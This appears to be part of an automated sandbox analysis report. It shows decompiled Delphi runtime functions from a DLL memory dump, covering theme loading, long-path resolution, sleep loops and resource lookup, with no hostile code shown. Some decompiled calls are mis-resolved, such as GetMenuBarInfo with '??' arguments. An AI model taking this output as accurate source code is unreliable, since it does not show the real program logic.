GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0072938A
GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0072939C
GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 007293AE
GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 007293C0
GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 007293D2
GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 007293E4
GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 007293F6
GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 00729408
GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0072941A
GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0072942C
GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0072943E
GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00729450
GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 00729462
GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 00729474
GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 00729486
GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 00729498
GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 007294AA
GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 007294BC
GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 007294CE
GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 007294E0
GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 007294F2
GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 00729504
GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 00729516
GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 00729528
GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0072953A
GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0072954C
GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0072955E
GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 00729570
GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 00729582
GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 00729594
GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 007295A6

Strings

GetThemeSysSize, xrefs: 007294A2
GetThemeSysColorBrush, xrefs: 0072947E
HitTestThemeBackground, xrefs: 00729316
GetThemeMetric, xrefs: 00729382
GetThemeBackgroundContentRect, xrefs: 007292AA, 007292BC
IsThemePartDefined, xrefs: 0072934C
uxtheme.dll, xrefs: 0072924D
GetThemePosition, xrefs: 007293DC
EnableTheming, xrefs: 0072959E
GetThemeFont, xrefs: 007293EE
SetWindowTheme, xrefs: 00729448
IsThemeBackgroundPartiallyTransparent, xrefs: 0072935E
GetThemeTextMetrics, xrefs: 007292F2
GetThemePartSize, xrefs: 007292CE
IsThemeActive, xrefs: 007294EA
SetThemeAppProperties, xrefs: 00729556
GetThemeFilename, xrefs: 0072945A
IsAppThemed, xrefs: 007294FC
GetThemeMargins, xrefs: 00729412
GetThemeSysString, xrefs: 007294C6
GetThemeSysColor, xrefs: 0072946C
DrawThemeBackground, xrefs: 00729286
GetThemeSysBool, xrefs: 00729490
GetCurrentThemeName, xrefs: 00729568
GetThemeInt, xrefs: 007293B8
GetThemeString, xrefs: 00729394
DrawThemeParentBackground, xrefs: 0072958C
GetThemeSysFont, xrefs: 007294B4
GetThemeAppProperties, xrefs: 00729544
GetThemeBackgroundRegion, xrefs: 00729304
GetWindowTheme, xrefs: 0072950E
OpenThemeData, xrefs: 00729262
GetThemeDocumentationProperty, xrefs: 0072957A
CloseThemeData, xrefs: 00729274
GetThemeSysInt, xrefs: 007294D8
DrawThemeEdge, xrefs: 00729328
GetThemePropertyOrigin, xrefs: 00729436
GetThemeTextExtent, xrefs: 007292E0
GetThemeRect, xrefs: 00729400
DrawThemeText, xrefs: 00729298
GetThemeEnumValue, xrefs: 007293CA
GetThemeBool, xrefs: 007293A6
IsThemeDialogTextureEnabled, xrefs: 00729532
EnableThemeDialogTexture, xrefs: 00729520
GetThemeIntList, xrefs: 00729424
GetThemeColor, xrefs: 00729370
DrawThemeIcon, xrefs: 0072933A

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
API String ID: 2238633743-2910565190
Opcode ID: bfad42bf86ccd24602374d229b6f896c81655ff772a28bc02625a9630c88dbfd
Instruction ID: f2edb4e36c1fdfcf8d63e3858f35af5029bf9b1dbc2f21e03071756c38d571b4
Opcode Fuzzy Hash: bfad42bf86ccd24602374d229b6f896c81655ff772a28bc02625a9630c88dbfd
Instruction Fuzzy Hash: DAA1E9F0A11760EFEF00EFB4FD9AA293BE8EB067007444665F501DF295D6BC99118B25

Uniqueness

Uniqueness Score: -1.00%

Function 007053C4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136
stringlibraryfileCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E007053C4(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E007053B0(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E007053B0(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L007012A4();
									while( *_t93 != 0) {
										_t90 = E007053B0(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L007012A4();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L007012AC();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L007012A4();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L007012AC();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L007012A4();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L007012A4();
						}
					}
				}
				L17:
				return _v16;
			}

0x007053d0
0x007053d3
0x007053d9
0x007053e6
0x007053ea
0x0070542c
0x00705432
0x0070546f
0x00000000
0x00705434
0x0070543b
0x0070544c
0x00705451
0x00705457
0x0070545f
0x00705464
0x00705472
0x00705474
0x0070547a
0x0070547e
0x00705485
0x00705486
0x00705531
0x00705498
0x0070549c
0x007054a9
0x007054b0
0x007054b1
0x007054ba
0x007054bb
0x007054d3
0x007054d8
0x007054db
0x007054e0
0x007054e6
0x007054e7
0x007054f7
0x007054f9
0x00705509
0x00705510
0x0070551a
0x0070551b
0x00705520
0x00705526
0x00705527
0x0070552d
0x0070552f
0x00000000
0x0070552f
0x007054f7
0x007054d8
0x00000000
0x007054a9
0x0070553d
0x00705544
0x00705548
0x00705549
0x00705549
0x00705464
0x00705451
0x0070543b
0x007053ec
0x007053f7
0x007053fb
0x00000000
0x007053fd
0x007053fd
0x00705408
0x0070540c
0x00705411
0x00000000
0x00705413
0x00705416
0x0070541d
0x00705421
0x00705422
0x00705422
0x00705411
0x007053fb
0x0070554e
0x00705557

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,0076C0A4,?,00705624,00000000,00705681,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 007053E1
GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 007053F2
lstrcpyn.KERNEL32(?,?,?,?,00705624,00000000,00705681,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00705422
lstrcpyn.KERNEL32(?,?,?,kernel32.dll,00000000,?,0076C0A4,?,00705624,00000000,00705681,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00705486
lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,00000000,?,0076C0A4,?,00705624,00000000,00705681,?,80000001), ref: 007054BB
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,00000000,?,0076C0A4,?,00705624,00000000,00705681), ref: 007054CE
FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,00000000,?,0076C0A4,?,00705624,00000000), ref: 007054DB
lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,00000000,?,0076C0A4,?,00705624), ref: 007054E7
lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,00000000,?), ref: 0070551B
lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,00000000), ref: 00705527
lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00705549

Strings

GetLongPathNameA, xrefs: 007053EC
\, xrefs: 007054F9
kernel32.dll, xrefs: 007053DC

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: 17ff3377fda2fe7b5fdf7a953d3e4a514314bfbce9b1c952aa217d5f9fe1a250
Instruction ID: 42924251e429106383035c5f671c5bc661be6a7ba172ceab1fd71ec8f437d3ed
Opcode Fuzzy Hash: 17ff3377fda2fe7b5fdf7a953d3e4a514314bfbce9b1c952aa217d5f9fe1a250
Instruction Fuzzy Hash: 83419272E00559EFDB10EAA8CC89ADFB7EEEF48314F5402B1A549D7181D678DE448F50

Uniqueness

Uniqueness Score: -1.00%

Function 00730108 Relevance: 7.7, APIs: 5, Instructions: 235
sleepCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00730108(int __eax, short __edx) {
				int _v8;
				short _v12;
				signed int _v16;
				signed int _v20;
				signed int _t127;
				void* _t138;
				signed int _t142;
				void* _t145;
				void* _t152;
				void* _t156;
				void* _t162;
				void* _t165;
				void* _t174;
				signed int _t190;
				void* _t191;
				signed int _t192;
				signed int _t193;
				intOrPtr _t209;
				void* _t222;
				signed int _t223;
				void* _t232;
				void* _t237;

				_v12 = __edx;
				_v8 = __eax;
				if( *((char*)(_v8 + 0x1f)) == 0 ||  *((intOrPtr*)(_v12 + 4)) - 4 >= 0) {
					_t127 =  *((short*)(_v12 + 4));
					if(_t127 > 7) {
						goto L46;
					}
					switch( *((intOrPtr*)(_t127 * 4 +  &M007302D9))) {
						case 0:
							return E00730478(_v8,  *((intOrPtr*)(_v8 + 0xc)) - ( *(_v8 + 8) & 0x0000ffff));
						case 1:
							__eax = _v8;
							__edx =  *((intOrPtr*)(_v8 + 0xc));
							_v8 =  *(_v8 + 8) & 0x0000ffff;
							__edx =  *((intOrPtr*)(_v8 + 0xc)) + ( *(_v8 + 8) & 0x0000ffff);
							__eax = _v8;
							return E00730478(_v8,  *((intOrPtr*)(_v8 + 0xc)) + ( *(_v8 + 8) & 0x0000ffff));
						case 2:
							__eax = _v8;
							__eax = GetMenuBarInfo(??, ??, ??, ??);
							_v8 =  *((intOrPtr*)(_v8 + 0xc));
							__edx =  *((intOrPtr*)(_v8 + 0xc)) - __eax;
							__eax = _v8;
							return E00730478(_v8, __edx);
						case 3:
							__eax = _v8;
							__edx = GetMenuBarInfo(??, ??, ??, ??);
							__eax = _v8;
							__edx = __edx +  *((intOrPtr*)(_v8 + 0xc));
							__eax = _v8;
							return E00730478(_v8, __edx);
						case 4:
							__eax = _v8;
							if( *((intOrPtr*)(_v8 + 0x14)) <= 0x7fff) {
								__edx = _v12;
								__edx =  *((short*)(_v12 + 6));
								__eax = _v8;
								return E00730478(_v8,  *((short*)(_v12 + 6)));
							}
							__edx = E007300A8(__ebp);
							__eax = _v8;
							return E00730478(_v8, __edx);
						case 5:
							__eax = _v8;
							if( *((char*)(_v8 + 0x1d)) == 0) {
								goto L46;
							}
							__eax = _v8;
							if( *((intOrPtr*)(_v8 + 0x14)) <= 0x7fff) {
								__edx = _v12;
								__edx =  *((short*)(_v12 + 6));
								__eax = _v8;
								return E00730478(_v8,  *((short*)(_v12 + 6)));
							}
							__edx = E007300A8(__ebp);
							__eax = _v8;
							return E00730478(_v8, __edx);
						case 6:
							__edx = 0;
							__eax = _v8;
							return E00730478(_v8, 0);
						case 7:
							__eax = _v8;
							__edx =  *((intOrPtr*)(_v8 + 0x14));
							__eax = _v8;
							return E00730478(_v8,  *((intOrPtr*)(_v8 + 0x14)));
					}
				} else {
					_t138 =  *((intOrPtr*)(_v12 + 4)) - 2;
					if(_t138 < 0) {
						_t190 =  *(_v8 + 8) & 0x0000ffff;
						_t192 =  *(_v8 + 0x40);
						asm("cdq");
						_v16 = _t190 / _t192;
						_t142 = _t190;
						asm("cdq");
						_t127 = _t142 / _t192;
						_v20 = _t142 % _t192;
						_t223 = _t192;
					} else {
						if(_t138 - 2 < 0) {
							_v16 =  *(_v8 + 0xa) & 0x0000ffff;
							_t193 =  *(_v8 + 0x3c);
							asm("cdq");
							_v20 = _v16 % _t193;
							asm("cdq");
							_t127 = _v16 / _t193;
							_v16 = _t127;
							_t223 = _t193;
						} else {
							_t223 = 0;
							_v16 = 0;
							_t127 = 0;
							_v20 = 0;
						}
					}
					_t222 = 0;
					if(_t223 <= 0) {
						L21:
						if(_v20 <= 0) {
							L46:
							return _t127;
						}
						_t145 =  *((intOrPtr*)(_v12 + 4)) - 1;
						_t237 = _t145;
						if(_t237 < 0) {
							return E00730478(_v8,  *((intOrPtr*)(_v8 + 0xc)) - _v20);
						}
						if(_t237 == 0) {
							return E00730478(_v8,  *((intOrPtr*)(_v8 + 0xc)) + _v20);
						}
						_t152 = _t145 - 1;
						if(_t152 == 0) {
							return E00730478(_v8,  *((intOrPtr*)(_v8 + 0xc)) - _v20);
						}
						_t156 = _t152 - 1;
						if(_t156 == 0) {
							return E00730478(_v8,  *((intOrPtr*)(_v8 + 0xc)) + _v20);
						}
						return _t156;
					} else {
						do {
							_t191 = E00706C6C();
							_t162 = _t191 - _t222;
							_t209 =  *((intOrPtr*)(_v8 + 0x20));
							if(_t162 < _t209) {
								Sleep(_t209 - _t162);
							}
							_t222 = _t191;
							_t165 =  *((intOrPtr*)(_v12 + 4)) - 1;
							_t232 = _t165;
							if(_t232 < 0) {
								E00730478(_v8,  *((intOrPtr*)(_v8 + 0xc)) - _v16);
							} else {
								if(_t232 == 0) {
									GetUserObjectInformationW();
								} else {
									_t174 = _t165 - 1;
									if(_t174 == 0) {
										E00730478(_v8,  *((intOrPtr*)(_v8 + 0xc)) - _v16);
									} else {
										if(_t174 == 1) {
											E00730478(_v8,  *((intOrPtr*)(_v8 + 0xc)) + _v16);
										}
									}
								}
							}
							_t127 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x88))();
							_t223 = _t223 - 1;
						} while (_t223 > 0);
						goto L21;
					}
				}
			}

0x00730111
0x00730114
0x0073011e
0x007302c5
0x007302cc
0x00000000
0x00000000
0x007302d2
0x00000000
0x00000000
0x00000000
0x00730315
0x00730318
0x0073031e
0x00730322
0x00730324
0x00000000
0x00000000
0x00730335
0x00730338
0x00730340
0x00730343
0x00730345
0x00000000
0x00000000
0x00730356
0x0073035e
0x00730360
0x00730363
0x00730366
0x00000000
0x00000000
0x00730373
0x0073037d
0x00730392
0x00730395
0x00730399
0x00000000
0x0073039c
0x00730386
0x00730388
0x00000000
0x00000000
0x007303a3
0x007303aa
0x00000000
0x00000000
0x007303ac
0x007303b6
0x007303cb
0x007303ce
0x007303d2
0x00000000
0x007303d5
0x007303bf
0x007303c1
0x00000000
0x00000000
0x007303dc
0x007303de
0x00000000
0x00000000
0x007303e8
0x007303eb
0x007303ee
0x00000000
0x00000000
0x00730135
0x0073013c
0x00730140
0x0073014d
0x00730156
0x00730159
0x0073015c
0x0073015f
0x00730161
0x00730162
0x00730164
0x00730167
0x00730142
0x00730146
0x00730172
0x00730178
0x0073017e
0x00730181
0x00730187
0x00730188
0x0073018a
0x0073018d
0x00730148
0x00730191
0x00730195
0x00730198
0x0073019a
0x0073019a
0x00730146
0x0073019d
0x007301a1
0x00730242
0x00730246
0x007303fc
0x007303fc
0x007303fc
0x00730253
0x00730253
0x00730257
0x00000000
0x00730276
0x00730259
0x00000000
0x0073028c
0x0073025b
0x0073025e
0x00000000
0x007302a2
0x00730260
0x00730263
0x00000000
0x007302b8
0x00000000
0x007301a7
0x007301a7
0x007301ac
0x007301b0
0x007301b5
0x007301ba
0x007301bf
0x007301bf
0x007301c4
0x007301cd
0x007301cd
0x007301d1
0x007301ed
0x007301d3
0x007301d3
0x00730200
0x007301d5
0x007301d5
0x007301d8
0x00730213
0x007301da
0x007301dd
0x00730226
0x00730226
0x007301dd
0x007301d8
0x007301d3
0x00730233
0x00730239
0x0073023a
0x00000000
0x007301a7
0x007301a1

APIs

Sleep.KERNEL32(?), ref: 007301BF
GetUserObjectInformationW.USER32 ref: 00730200

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: InformationObjectSleepUser
String ID:
API String ID: 335310428-0
Opcode ID: 1aff24d065e6b569a32c44af94fefaf4a2e86952fa96b744b6e28a602b1df6c1
Instruction ID: 3383b4f96ea5fed6d2b9f29a3c5b84338cbe593e8875f025936b44d728134f95
Opcode Fuzzy Hash: 1aff24d065e6b569a32c44af94fefaf4a2e86952fa96b744b6e28a602b1df6c1
Instruction Fuzzy Hash: 1891F634A44108DFEB44DBA8C6A99AEB7F1FF44310F248295E854A7317D738EE40AB94

Uniqueness

Uniqueness Score: -1.00%

Function 0072C54C Relevance: 6.0, APIs: 4, Instructions: 46
sleepCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0072C54C(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				CHAR* _t20;
				long _t25;
				intOrPtr _t30;
				void* _t34;
				intOrPtr _t37;

				_push(0);
				_t34 = __eax;
				_push(_t37);
				_push(0x72c5c9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t37;
				L0072BFAC(__eax);
				_t25 = GetTickCount();
				do {
					Sleep(0);
				} while (GetTickCount() - _t25 <= 0x3e8);
				L0072BBAC(_t34, _t25,  &_v8, 0, __edi, _t34);
				if(_v8 != 0) {
					_t20 = E00704528(_v8);
					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
				}
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(0x72c5d0);
				return E00704068( &_v8);
			}

0x0072c54f
0x0072c553
0x0072c557
0x0072c558
0x0072c55d
0x0072c560
0x0072c565
0x0072c56f
0x0072c571
0x0072c573
0x0072c57f
0x0072c58d
0x0072c596
0x0072c59f
0x0072c5ae
0x0072c5ae
0x0072c5b5
0x0072c5b8
0x0072c5bb
0x0072c5c8

APIs

Part of subcall function 0072BFAC: WinHelpA.USER32 ref: 0072BFBB

GetTickCount.KERNEL32 ref: 0072C56A
Sleep.KERNEL32(00000000,00000000,0072C5C9,?,?,00000000,00000000,?,0072C542), ref: 0072C573
GetTickCount.KERNEL32 ref: 0072C578
WinHelpA.USER32 ref: 0072C5AE

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: CountHelpTick$Sleep
String ID:
API String ID: 2438605093-0
Opcode ID: 2c4753cdf97dbb08393de8f2789201956cec870b4a96fae9073fcddd9900a883
Instruction ID: 2fae21408a47383251a70b0507b2a87557245f176a4cb9ffe5d3b502124a852c
Opcode Fuzzy Hash: 2c4753cdf97dbb08393de8f2789201956cec870b4a96fae9073fcddd9900a883
Instruction Fuzzy Hash: DD01AD70700214EFE312FBA5DD6BB1EB7E8DB49B00F614261F500D25C5DB78AF208562

Uniqueness

Uniqueness Score: -1.00%

Function 0074A9F4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0074A9F4(void* __eax, intOrPtr* __edx) {
				char _v20;
				char _v28;
				intOrPtr _t17;
				void* _t19;
				void* _t21;
				void* _t32;
				void* _t39;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t50;
				void* _t51;
				intOrPtr* _t65;
				intOrPtr* _t67;
				void* _t68;

				_t67 = __edx;
				_t50 = __eax;
				_t17 =  *__edx;
				_t68 = _t17 - 0x84;
				if(_t68 > 0) {
					_t19 = _t17 + 0xffffff00 - 9;
					if(_t19 < 0) {
						_t21 = E00747054(__eax);
						if(_t21 != 0) {
							L28:
							return _t21;
						}
						L27:
						return L00747B64(_t50, _t67);
					}
					if(_t19 + 0xffffff09 - 0xb < 0) {
						_t21 = E0074A960(__eax, _t51, __edx);
						if(_t21 == 0) {
							goto L27;
						}
						if( *((intOrPtr*)(_t67 + 0xc)) != 0) {
							goto L28;
						}
						_t21 = E0074D240(_t50);
						if(_t21 == 0) {
							goto L28;
						}
						_push( *((intOrPtr*)(_t67 + 8)));
						_push( *((intOrPtr*)(_t67 + 4)));
						_push( *_t67);
						_t32 = E0074CFE0(_t50);
						_push(_t32);
						L007067F0();
						return _t32;
					}
					goto L27;
				}
				if(_t68 == 0) {
					_t21 = L00747B64(__eax, __edx);
					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
						goto L28;
					}
					E00706CD8( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
					E00746470(_t50,  &_v28,  &_v20);
					_t21 = E0074A8CC(_t50, 0,  &_v28, 0);
					if(_t21 == 0) {
						goto L28;
					}
					 *((intOrPtr*)(_t67 + 0xc)) = 1;
					return _t21;
				}
				_t39 = _t17 - 7;
				if(_t39 == 0) {
					_t65 = L0072FBE8(__eax);
					if(_t65 == 0) {
						goto L27;
					}
					_t21 =  *((intOrPtr*)( *_t65 + 0xe8))();
					if(_t21 == 0) {
						goto L28;
					}
					goto L27;
				}
				_t21 = _t39 - 1;
				if(_t21 == 0) {
					if(( *(__eax + 0x54) & 0x00000020) != 0) {
						goto L28;
					}
				} else {
					if(_t21 == 0x17) {
						_t45 = E0074CFE0(__eax);
						if(_t45 == GetCapture() &&  *0x76cce0 != 0) {
							_t47 =  *0x76cce0; // 0x0
							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
								_t48 =  *0x76cce0; // 0x0
								L00747A98(_t48, 0, 0x1f, 0);
							}
						}
					}
				}
			}

0x0074a9fa
0x0074a9fc
0x0074a9fe
0x0074aa00
0x0074aa05
0x0074aa24
0x0074aa27
0x0074ab04
0x0074ab0b
0x0074ab56
0x0074ab56
0x0074ab56
0x0074ab47
0x00000000
0x0074ab4b
0x0074aa35
0x0074aace
0x0074aad5
0x00000000
0x00000000
0x0074aadb
0x00000000
0x00000000
0x0074aadf
0x0074aae6
0x00000000
0x00000000
0x0074aaeb
0x0074aaef
0x0074aaf2
0x0074aaf5
0x0074aafa
0x0074aafb
0x00000000
0x0074aafb
0x00000000
0x0074aa3b
0x0074aa07
0x0074aa7d
0x0074aa86
0x00000000
0x00000000
0x0074aa95
0x0074aaa4
0x0074aab1
0x0074aab8
0x00000000
0x00000000
0x0074aabe
0x00000000
0x0074aabe
0x0074aa09
0x0074aa0c
0x0074aa47
0x0074aa4b
0x00000000
0x00000000
0x0074aa57
0x0074aa5f
0x00000000
0x00000000
0x00000000
0x0074aa65
0x0074aa0e
0x0074aa0f
0x0074aa6e
0x00000000
0x00000000
0x0074aa11
0x0074aa14
0x0074ab11
0x0074ab1f
0x0074ab2a
0x0074ab32
0x0074ab3d
0x0074ab42
0x0074ab42
0x0074ab32
0x0074ab1f
0x0074aa14

APIs

GetCapture.USER32 ref: 0074AB18

Strings

, xrefs: 0074AA6A

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: Capture
String ID:
API String ID: 1145282425-3916222277
Opcode ID: 756d7bec61a7bd25f8bc185b9c332457c55a03bfa4687b842d079bd8c0c639ed
Instruction ID: 48fcab0f47122bec3b4fa7533345bf1fea959de78bc6b8a7e044c61ccb9134e3
Opcode Fuzzy Hash: 756d7bec61a7bd25f8bc185b9c332457c55a03bfa4687b842d079bd8c0c639ed
Instruction Fuzzy Hash: 5C31A4F1384740ABDB209E3CC989B2A6396EB45314F15C939B85ACB692DB3CDC48D743

Uniqueness

Uniqueness Score: -1.00%

Function 00716C2C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00716C2C(void* __eax, struct HINSTANCE__* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t10;
				struct HINSTANCE__* _t20;
				intOrPtr* _t22;
				intOrPtr _t30;
				void* _t32;
				intOrPtr* _t35;
				intOrPtr _t38;
				intOrPtr _t40;

				_t38 = _t40;
				_push(_t22);
				_t35 = _t22;
				_t20 = __edx;
				_t32 = __eax;
				if(__edx == 0) {
					_t20 =  *0x76f668; // 0x700000
				}
				_t10 = FindResourceA(_t20, E00704528(_t32), 0xa) & 0xffffff00 | _t9 != 0x00000000;
				_t43 = _t10;
				if(_t10 == 0) {
					return _t10;
				} else {
					_v8 = E00719738(_t20, 1, 0xa, _t32);
					_push(_t38);
					_push(0x716ca0);
